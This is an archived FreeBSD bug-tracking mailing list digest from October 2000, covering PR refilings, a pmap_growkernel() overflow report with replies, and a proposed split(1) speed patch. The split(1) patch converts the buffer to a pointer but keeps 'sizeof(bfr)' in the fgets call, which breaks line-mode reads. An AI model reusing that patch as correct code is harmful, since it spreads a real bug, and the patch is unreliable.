ESMTP id 2A9D737B4CF; Tue, 31 Oct 2000 00:23:35 -0800 (PST) Received: (from asmodai@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA14333; Tue, 31 Oct 2000 00:23:34 -0800 (PST) (envelope-from asmodai@FreeBSD.org) Date: Tue, 31 Oct 2000 00:23:34 -0800 (PST) From: Message-Id: <200010310823.AAA14333@freefall.freebsd.org> To: bartequi@inwind.it, asmodai@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/22292: Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: State-Changed-From-To: open->closed State-Changed-By: asmodai State-Changed-When: Tue Oct 31 00:20:47 PST 2000 State-Changed-Why: Follow-up to misc/22290, which got assigned to its own PR due to something like Novell GroupWise/Microsoft Outlook. Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: asmodai Responsible-Changed-When: Tue Oct 31 00:20:47 PST 2000 Responsible-Changed-Why: Doesn't belong to gnats-admin. http://www.freebsd.org/cgi/query-pr.cgi?pr=22292 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 0:34:56 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1859837B479; Tue, 31 Oct 2000 00:34:54 -0800 (PST) Received: (from asmodai@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA18198; Tue, 31 Oct 2000 00:34:52 -0800 (PST) (envelope-from asmodai@FreeBSD.org) Date: Tue, 31 Oct 2000 00:34:52 -0800 (PST) From: Message-Id: <200010310834.AAA18198@freefall.freebsd.org> To: simon@allstor-sw.co.uk, asmodai@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/22305: Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: State-Changed-From-To: open->feedback State-Changed-By: asmodai State-Changed-When: Tue Oct 31 00:30:12 PST 2000 State-Changed-Why: For 6 weeks doesn't really help us, since we were unaware of your system having problems. I gather this is a SCSI:SCSI unit? Do you have SCSI parity on? Are you sure you have the proper cables? How about termination? For the record, the panic suggests to me, and some others, that you are experiencing data corruption. This can be due to bad system RAM, wrong memory timing settings in BIOS, etc, etc. You really need to provide more details, appropriate output from /var/log/messages or /var/run/dmesg.boot and likewise. Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: asmodai Responsible-Changed-When: Tue Oct 31 00:30:12 PST 2000 Responsible-Changed-Why: Belongs to the bugs list. http://www.freebsd.org/cgi/query-pr.cgi?pr=22305 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 0:37:59 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 06F8C37B4C5; Tue, 31 Oct 2000 00:37:58 -0800 (PST) Received: (from asmodai@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA19422; Tue, 31 Oct 2000 00:37:58 -0800 (PST) (envelope-from asmodai@FreeBSD.org) Date: Tue, 31 Oct 2000 00:37:58 -0800 (PST) From: Message-Id: <200010310837.AAA19422@freefall.freebsd.org> To: gibbs@scsiguy.com, asmodai@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/22219: M_ZERO changes for -cam Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: M_ZERO changes for -cam State-Changed-From-To: open->closed State-Changed-By: asmodai State-Changed-When: Tue Oct 31 00:36:06 PST 2000 State-Changed-Why: PR created due to reply to another PR. Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: asmodai Responsible-Changed-When: Tue Oct 31 00:36:06 PST 2000 Responsible-Changed-Why: belonged in the bugs list. http://www.freebsd.org/cgi/query-pr.cgi?pr=22219 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 0:38:28 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 618F437B4C5; Tue, 31 Oct 2000 00:38:27 -0800 (PST) Received: (from asmodai@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA19682; Tue, 31 Oct 2000 00:38:27 -0800 (PST) (envelope-from asmodai@FreeBSD.org) Date: Tue, 31 Oct 2000 00:38:27 -0800 (PST) From: Message-Id: <200010310838.AAA19682@freefall.freebsd.org> To: asmodai@FreeBSD.org, freebsd-bugs@FreeBSD.org, des@FreeBSD.org Subject: Re: kern/22435: linprocfs causes system down and reboot Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: linprocfs causes system down and reboot Responsible-Changed-From-To: freebsd-bugs->des Responsible-Changed-By: asmodai Responsible-Changed-When: Tue Oct 31 00:38:03 PST 2000 Responsible-Changed-Why: Over to maintainer. http://www.freebsd.org/cgi/query-pr.cgi?pr=22435 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 0:39:44 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BD98E37B4C5; Tue, 31 Oct 2000 00:39:42 -0800 (PST) Received: (from asmodai@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA20251; Tue, 31 Oct 2000 00:39:42 -0800 (PST) (envelope-from asmodai@FreeBSD.org) Date: Tue, 31 Oct 2000 00:39:42 -0800 (PST) From: Message-Id: <200010310839.AAA20251@freefall.freebsd.org> To: asmodai@FreeBSD.org, freebsd-bugs@FreeBSD.org, asmodai@FreeBSD.org Subject: Re: bin/22394: NT based DNS slaves can't make zone transfers from FreeBSD master Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: NT based DNS slaves can't make zone transfers from FreeBSD master Responsible-Changed-From-To: freebsd-bugs->asmodai Responsible-Changed-By: asmodai Responsible-Changed-When: Tue Oct 31 00:39:13 PST 2000 Responsible-Changed-Why: I look after BIND stuff. http://www.freebsd.org/cgi/query-pr.cgi?pr=22394 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 0:41: 7 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4047337B4C5; Tue, 31 Oct 2000 00:41:06 -0800 (PST) Received: (from asmodai@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA20786; Tue, 31 Oct 2000 00:41:06 -0800 (PST) (envelope-from asmodai@FreeBSD.org) Date: Tue, 31 Oct 2000 00:41:06 -0800 (PST) From: Message-Id: <200010310841.AAA20786@freefall.freebsd.org> To: des@ofug.org, asmodai@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/21926: Re: Unjustified basename code removal and subsequent breakage Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Re: Unjustified basename code removal and subsequent breakage State-Changed-From-To: open->closed State-Changed-By: asmodai State-Changed-When: Tue Oct 31 00:40:12 PST 2000 State-Changed-Why: Another PR which got created by a PR reply. Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: asmodai Responsible-Changed-When: Tue Oct 31 00:40:12 PST 2000 Responsible-Changed-Why: Doesn't belong to gnats-admin. http://www.freebsd.org/cgi/query-pr.cgi?pr=21926 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 5:36:30 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8BE6137B4D7; Tue, 31 Oct 2000 05:36:28 -0800 (PST) Received: (from asmodai@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA39358; Tue, 31 Oct 2000 05:36:28 -0800 (PST) (envelope-from asmodai@FreeBSD.org) Date: Tue, 31 Oct 2000 05:36:28 -0800 (PST) From: Message-Id: <200010311336.FAA39358@freefall.freebsd.org> To: gibbs@scsiguy.com, asmodai@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/21916: Re: Machine dies sig 12 in ahc driver (Freebsd4.1.1) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Re: Machine dies sig 12 in ahc driver (Freebsd4.1.1) State-Changed-From-To: open->closed State-Changed-By: asmodai State-Changed-When: Tue Oct 31 05:32:20 PST 2000 State-Changed-Why: Followup to existing PR. Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: asmodai Responsible-Changed-When: Tue Oct 31 05:32:20 PST 2000 Responsible-Changed-Why: Refile. http://www.freebsd.org/cgi/query-pr.cgi?pr=21916 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 5:37:38 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8F84937B4CF; Tue, 31 Oct 2000 05:37:36 -0800 (PST) Received: (from asmodai@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA39806; Tue, 31 Oct 2000 05:37:36 -0800 (PST) (envelope-from asmodai@FreeBSD.org) Date: Tue, 31 Oct 2000 05:37:36 -0800 (PST) From: Message-Id: <200010311337.FAA39806@freefall.freebsd.org> To: joe@pavilion.net, asmodai@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/21925: Re: Machine dies sig 12 in ahc driver (Freebsd4.1.1) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Re: Machine dies sig 12 in ahc driver (Freebsd4.1.1) State-Changed-From-To: open->closed State-Changed-By: asmodai State-Changed-When: Tue Oct 31 05:36:38 PST 2000 State-Changed-Why: Follow-up to another PR. Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: asmodai Responsible-Changed-When: Tue Oct 31 05:36:38 PST 2000 Responsible-Changed-Why: Refile. http://www.freebsd.org/cgi/query-pr.cgi?pr=21925 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 5:41:47 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2743C37B479; Tue, 31 Oct 2000 05:41:45 -0800 (PST) Received: (from asmodai@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA41518; Tue, 31 Oct 2000 05:41:45 -0800 (PST) (envelope-from asmodai@FreeBSD.org) Date: Tue, 31 Oct 2000 05:41:45 -0800 (PST) From: Message-Id: <200010311341.FAA41518@freefall.freebsd.org> To: asmodai@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/22434: problem with certain NIC's using rl on autoselect(10/100) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: problem with certain NIC's using rl on autoselect(10/100) Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: asmodai Responsible-Changed-When: Tue Oct 31 05:41:22 PST 2000 Responsible-Changed-Why: Refile. http://www.freebsd.org/cgi/query-pr.cgi?pr=22434 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 6:10: 6 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 04F6137B4CF for ; Tue, 31 Oct 2000 06:10:02 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA53884; Tue, 31 Oct 2000 06:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 4943437B4C5; Tue, 31 Oct 2000 06:07:58 -0800 (PST) Message-Id: <20001031140758.4943437B4C5@hub.freebsd.org> Date: Tue, 31 Oct 2000 06:07:58 -0800 (PST) From: carp@world.std.com To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: i386/22441: pmap_growkernel() is not effective at kernel vm limit of 0xffc00000 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22441 >Category: i386 >Synopsis: pmap_growkernel() is not effective at kernel vm limit of 0xffc00000 >Confidential: no >Severity: serious >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Oct 31 06:10:01 PST 2000 >Closed-Date: >Last-Modified: >Originator: Bill Carpenter >Release: FreeBSD 4.1.1-RELEASE >Organization: >Environment: FreeBSD buffoon.eng.infolibria.com 4.1.1-RELEASE FreeBSD 4.1.1-RELEASE #0: Tue Sep 26 00:46:59 GMT 2000 jkh@narf.osd.bsdi.com:/usr/src/sys/compile/GENERIC i386 >Description: When called with a kernel vm limit of 0xffc00000, pamp_growkernel() does not set-up the page mapping hardware because of an overflow. In this line: addr = (addr + PAGE_SIZE * NPTEPG) & ~(PAGE_SIZE * NPTEPG - 1); ( Line 1403 in $FreeBSD: src/sys/i386/i386/pmap.c,v 1.250.2.5 2000/08/05 00:39:08 peter Exp $) addr + PAGE_SIZE * NPTEPG overflows to zero when addr is 0xffc00000. When addr is zero, the conditional in the following while loop is never satisfied and the hardware page mapping data structures are never initialized to cover the extended kernel vm. I would also like to suggest that test of kernel_vm_end in vm_map_findspace() (src/sys/vm/vm_map.c) is a minor software layering violation. kernel_vm_end is properly a pmap layer variable and the test against kernel_vm_end should occur in pmap_growkernel(). I realize that making this change might appear to impede performance, but pmap_growkernel() only gets called during kernel initialization when the kernel is setting up sub-maps of the kernel map. (kernel_map) >How-To-Repeat: I am writing a driver that creates kernel vm up against the limit of kernel vm and therefore requests that the kernel vm grow to 0xffc00000. I could submit a sample of the driver, but paper and pencil should convince the reader that when PAGE_SIZE is 4096 and NPTEPG is 1024, 0xffc00000 + (4096 * 1024) overflows to zero. >Fix: In line 1403, I used a standard rounding macro and all appears well. For instance, I have compiled and tested the kernel with: addr = roundup(addr, (PAGE_SIZE*NPTEPG)); Now that I got all of this typed, it appears that the kernel is being extended an extra 4Mbytes whenever the limit submitted to pmap_growkernel() falls on a 4Mbyte (i386 page directory) boundary. The kernel, correctly, rounds up its vm limit to the next page and in most cases, the boundary submitted to pmap_growkernel() falls on a page boundary. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 6:30:10 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6EB2637B4C5 for ; Tue, 31 Oct 2000 06:30:06 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA61582; Tue, 31 Oct 2000 06:30:06 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 31 Oct 2000 06:30:06 -0800 (PST) Message-Id: <200010311430.GAA61582@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: David Greenman Subject: Re: i386/22441: pmap_growkernel() is not effective at kernel vm limit of 0xffc00000 Reply-To: David Greenman Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR i386/22441; it has been noted by GNATS. From: David Greenman To: carp@world.std.com Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: i386/22441: pmap_growkernel() is not effective at kernel vm limit of 0xffc00000 Date: Tue, 31 Oct 2000 06:23:19 -0800 >When called with a kernel vm limit of 0xffc00000, pamp_growkernel() >does not set-up the page mapping hardware because of an overflow. > >In this line: > > addr = (addr + PAGE_SIZE * NPTEPG) & ~(PAGE_SIZE * NPTEPG - 1); > ( Line 1403 in $FreeBSD: src/sys/i386/i386/pmap.c,v 1.250.2.5 2000/08/05 00:39:08 peter Exp $) > >addr + PAGE_SIZE * NPTEPG overflows to zero when addr is 0xffc00000. I might not be understanding what you're doing exactly, but I should point out that the alternate page table map (APTmap) starts at 0xffc00000, so I don't see how you could ever use that area of virtual memory without serious problems. What am I missing? -DG David Greenman Co-founder, The FreeBSD Project - http://www.freebsd.org President, TeraSolutions, Inc. - http://www.terasolutions.com Pave the road of life with opportunities. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 6:30:13 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7D78E37B4E5 for ; Tue, 31 Oct 2000 06:30:01 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA61560; Tue, 31 Oct 2000 06:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from mta03-svc.ntlworld.com (mta03-svc.ntlworld.com [62.253.162.43]) by hub.freebsd.org (Postfix) with ESMTP id 9CE2737B4CF for ; Tue, 31 Oct 2000 06:21:57 -0800 (PST) Received: from m521-mp1-cvx1b.gui.ntl.com ([62.252.10.9]) by mta03-svc.ntlworld.com (InterMail vM.4.01.02.27 201-229-119-110) with ESMTP id <20001031142152.GKTZ283.mta03-svc.ntlworld.com@m521-mp1-cvx1b.gui.ntl.com> for ; Tue, 31 Oct 2000 14:21:52 +0000 Message-Id: Date: Tue, 31 Oct 2000 14:24:15 +0000 (GMT) From: George Reid To: FreeBSD-gnats-submit@freebsd.org Subject: bin/22442: [PATCH] Increase speed of split(1) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22442 >Category: bin >Synopsis: [PATCH] Increase speed of split(1) >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Oct 31 06:30:01 PST 2000 >Closed-Date: >Last-Modified: >Originator: George Reid >Release: FreeBSD 5.0-CURRENT i386 >Organization: FreeBSD UK User Group >Environment: >Description: The speed of split(1) can be increased by using dynamically-allocated buffers. The following results are from a large file created with dd if=/dev/zero of=bigfile bs=1024k count=300 $ /usr/bin/time split -b 1024k bigfile 90.19 real 0.02 user 22.42 sys $ /usr/bin/time ./mysplit -b 1024k bigfile 81.81 real 0.04 user 25.60 sys This could represent problems on systems with low memory (perhaps further modification is needed), but given that the average amount of memory being distributed with PCs nowadays, this might be useful. >How-To-Repeat: >Fix: --- split.c.orig Tue Oct 31 14:11:46 2000 +++ split.c Tue Oct 31 14:16:30 2000 @@ -62,7 +62,7 @@ long numlines; /* Line count to split on. */ int file_open; /* If a file open. */ int ifd = -1, ofd = -1; /* Input/output file descriptors. */ -char bfr[MAXBSIZE]; /* I/O buffer. */ +char *bfr; /* I/O buffer. */ char fname[MAXPATHLEN]; /* File name prefix. */ regex_t rgx; int pflag; @@ -176,11 +176,16 @@ int dist, len; char *C; + if((bfr = (char *)malloc(bytecnt)) == NULL) + err(EX_OSERR, "malloc"); + for (bcnt = 0;;) - switch ((len = read(ifd, bfr, MAXBSIZE))) { + switch ((len = read(ifd, bfr, bytecnt))) { case 0: + free(bfr); exit(0); case -1: + free(bfr); err(EX_IOERR, "read"); /* NOTREACHED */ default: @@ -195,22 +200,29 @@ len -= bytecnt, C += bytecnt) { newfile(); if (write(ofd, - C, (int)bytecnt) != bytecnt) + C, (int)bytecnt) != bytecnt) { + free(bfr); err(EX_IOERR, "write"); + } } if (len != 0) { newfile(); - if (write(ofd, C, len) != len) + if (write(ofd, C, len) != len) { + free(bfr); err(EX_IOERR, "write"); + } } else file_open = 0; bcnt = len; } else { bcnt += len; - if (write(ofd, bfr, len) != len) + if (write(ofd, bfr, len) != len) { + free(bfr); err(EX_IOERR, "write"); + } } } + free(bfr); } /* @@ -227,6 +239,9 @@ if ((infp = fdopen(ifd, "r")) == NULL) err(EX_NOINPUT, "fdopen"); + if((bfr = (char *)malloc(MAXBSIZE)) == NULL) + err(EX_OSERR, "malloc"); + /* Process input one line at a time */ while (fgets(bfr, sizeof(bfr), infp) != NULL) { const int len = strlen(bfr); @@ -254,9 +269,13 @@ newfile(); /* Write out line */ - if (write(ofd, bfr, len) != len) + if (write(ofd, bfr, len) != len) { + free(bfr); err(EX_IOERR, "write"); + } } + + free(bfr); /* EOF or error? */ if (ferror(infp)) >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 6:42:59 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5470337B4CF; Tue, 31 Oct 2000 06:42:57 -0800 (PST) Received: (from asmodai@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA66055; Tue, 31 Oct 2000 06:42:57 -0800 (PST) (envelope-from asmodai@FreeBSD.org) Date: Tue, 31 Oct 2000 06:42:57 -0800 (PST) From: Message-Id: <200010311442.GAA66055@freefall.freebsd.org> To: asmodai@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/22028: Follow-up to kern/21308 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Follow-up to kern/21308 Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: asmodai Responsible-Changed-When: Tue Oct 31 06:42:24 PST 2000 Responsible-Changed-Why: Refile. http://www.freebsd.org/cgi/query-pr.cgi?pr=22028 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 7:30: 8 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 52BAC37B4C5 for ; Tue, 31 Oct 2000 07:30:03 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA23005; Tue, 31 Oct 2000 07:30:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 31 Oct 2000 07:30:03 -0800 (PST) Message-Id: <200010311530.HAA23005@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: William J Carpenter Subject: Re: i386/22441: pmap_growkernel() is not effective at kernel vm limit of 0xffc00000 Reply-To: William J Carpenter Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR i386/22441; it has been noted by GNATS. From: William J Carpenter To: dg@root.com Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: i386/22441: pmap_growkernel() is not effective at kernel vm limit of 0xffc00000 Date: Tue, 31 Oct 2000 10:20:20 -0500 (EST) cc: freebsd-gnats-submit@FreeBSD.ORG From: David Greenman Reply-To: dg@root.com Date: Tue, 31 Oct 2000 06:23:19 -0800 Sender: dg@implode.root.com >When called with a kernel vm limit of 0xffc00000, pamp_growkernel() >does not set-up the page mapping hardware because of an overflow. > >In this line: > > addr = (addr + PAGE_SIZE * NPTEPG) & ~(PAGE_SIZE * NPTEPG - 1); > ( Line 1403 in $FreeBSD: src/sys/i386/i386/pmap.c,v 1.250.2.5 2000/08/05 00:39:08 peter Exp $) > >addr + PAGE_SIZE * NPTEPG overflows to zero when addr is 0xffc00000. I might not be understanding what you're doing exactly, I am not sure that what I am doing is strictly necessary, but I can successfully allocate kernel vm this way in BSDI. but I should point out that the alternate page table map (APTmap) starts at 0xffc00000, so I don't see how you could ever use that area of virtual memory without serious problems. What am I missing? That's good to know. The problem is that 0xffc00000 is passed as a limit to pmap_growkernel(). I am not using 0xffc00000, I am using memory up to 0xffc00000 which is the advertised limit to kernel vm. (kernel_map->header.end) (kgdb) print /x * kernel_map $221 = {header = {prev = 0xc02c1d60, next = 0xc02c1f70, start = 0xbfeff000, end = 0xffc00000, avail_ssize = 0x0, object = {vm_object = 0x0, sub_map = 0x0}, offset = 0x0, eflags = 0x0, protection = 0x0, max_protection = 0x0, inheritance = 0x0, wired_count = 0x0, lastr = 0x0}, lock = {lk_interlock = {lock_data = 0x0}, lk_flags = 0x1000000, lk_sharecount = 0x0, lk_waitcount = 0x0, lk_exclusivecount = 0x0, lk_prio = 0x4, lk_wmesg = 0xc0277da0, lk_timo = 0x0, lk_lockholder = 0xffffffff}, nentries = 0x9, size = 0x1e531000, system_map = 0x1, hint = 0xc02c1d60, timestamp = 0x21, first_free = 0xc02c1d00, pmap = 0xc02cf8c0} Pmap_growkernel()'s job is to set-up the physical page mappings to cover the increased kernel vm. In order to do this on the i386 architecture, a page map directory entry must be made for every 4mbytes of memory. The kernel vm layer rounds vm up to a page boundary. The physical map layer must round-up a 4mbyte boundary because of the two level i386 page mapping hierarchy. If the vm layer kernel memory limit falls on a page boundary, but not on a page directory boundary, say 0xffb01000, then as far as physical map layer is concerned, a page directory entry must be created to cover vm from 0xffb00000 to 0xffbfffff. If the vm layer limit falls on 0xffb00000, this means that the kernel requested vm in the range 0xffaff000 to 0xffafffff. The vm layer rounds this address up to 0xffb00000 and declares that this is the limit for pmap_growkernel(). In the case where the limit is 0xffb00000, pmap_growkernel actually makes a page directory entry for adresses >= 0xffb00000 -- a harmless sort of overflow which merely sucks up an extra page of memory. In the case where the kernel vm grows to the range of [ 0xffbff001, 0xffc00000-1 ], (the page below 0xffc00000, in this case, kernel vm requested explicitly by me), pmap_growkernel() overflows by rounding 0xffc0000 up to the next 4m boundary which on 32-bit machines is 0. I hope this helps explain what I think is a problem. Bill -- Bill Carpenter carp@world.std.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 9:10: 5 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C426837B4C5 for ; Tue, 31 Oct 2000 09:10:01 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA96037; Tue, 31 Oct 2000 09:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 076CD37B479; Tue, 31 Oct 2000 09:07:11 -0800 (PST) Message-Id: <20001031170711.076CD37B479@hub.freebsd.org> Date: Tue, 31 Oct 2000 09:07:11 -0800 (PST) From: gritton@iserver.com To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/22443: asr driver can't do dumps Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22443 >Category: kern >Synopsis: asr driver can't do dumps >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: wish >Submitter-Id: current-users >Arrival-Date: Tue Oct 31 09:10:01 PST 2000 >Closed-Date: >Last-Modified: >Originator: James Gritton >Release: 4.1.1-RELEASE >Organization: Verio Web Hosting >Environment: FreeBSD glasscat.iserver.com 4.1-RELEASE FreeBSD 4.1-RELEASE #4: Thu Oct 26 14:28:45 MDT 2000 root@fc:/usr/src/sys/compile/VKERN i386 >Description: The asr driver on 4.1.1 (I'm using the drop-in available for 4.1, but it's the same code) lacks a dump handler. >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 9:52:31 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1201537B479; Tue, 31 Oct 2000 09:52:30 -0800 (PST) Received: (from johan@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA11771; Tue, 31 Oct 2000 09:52:30 -0800 (PST) (envelope-from johan@FreeBSD.org) Date: Tue, 31 Oct 2000 09:52:30 -0800 (PST) From: Message-Id: <200010311752.JAA11771@freefall.freebsd.org> To: wkwu@Omega.csie.NCTU.edu.tw, johan@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/22072: make 